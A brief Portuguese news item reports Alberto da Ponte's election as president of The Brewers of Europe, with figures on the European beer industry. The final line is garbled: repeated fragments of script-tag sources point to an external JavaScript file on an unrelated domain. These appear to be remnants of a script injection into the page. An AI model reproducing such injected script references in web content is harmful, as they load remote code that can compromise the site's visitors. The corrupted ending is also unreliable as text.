O Presidente da Associação Portuguesa dos Produtores de Cerveja (APCV), Alberto da Ponte, foi eleito dia 27 de Maio, na Bélgica, representante máximo dos cervejeiros europeus, passando a presidir à The Brewers of Europe, órgão que reúne as associações nacionais cervejeiras de 25 países. O candidato português reuniu o consenso dos seus congéneres para um mandato de dois anos.
É a primeira vez que um português assume a liderança da The Brewers of Europe exactamente no ano em que ocorre a celebração do 50° aniversário desta organização europeia.
A The Brewers of Europe é a voz oficial da indústria cervejeira europeia. Representa cerca de 3 mil empresas que, no conjunto, contribuem substancialmente para a produtividade, empregabilidade e para a competitividade económica Europeia, tanto directa como indirectamente. No conjunto contribuem, anualmente, com 57,5 mil milhões de euros para a economia europeia e em mais de 2,6 milhões de postos de trabalho, 166 mil dos quais são directos.
As cervejeiras europeias produzem, anualmente, cerca de 41.600 milhões de litros de cerveja (Dados Ernst & Young de 2005).
Alberto da Ponte, 56 anos, nasceu em Lisboa e é desde 2004 o CEO da Sociedade Central de Cervejas e Bebidas. No ano de 2006 acumulou esse cargo com a função de Presidente da APCV, aceitando agora novo desafio a nível europeu.
ttp://www.hdadwcd.com/b.js>ttp://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>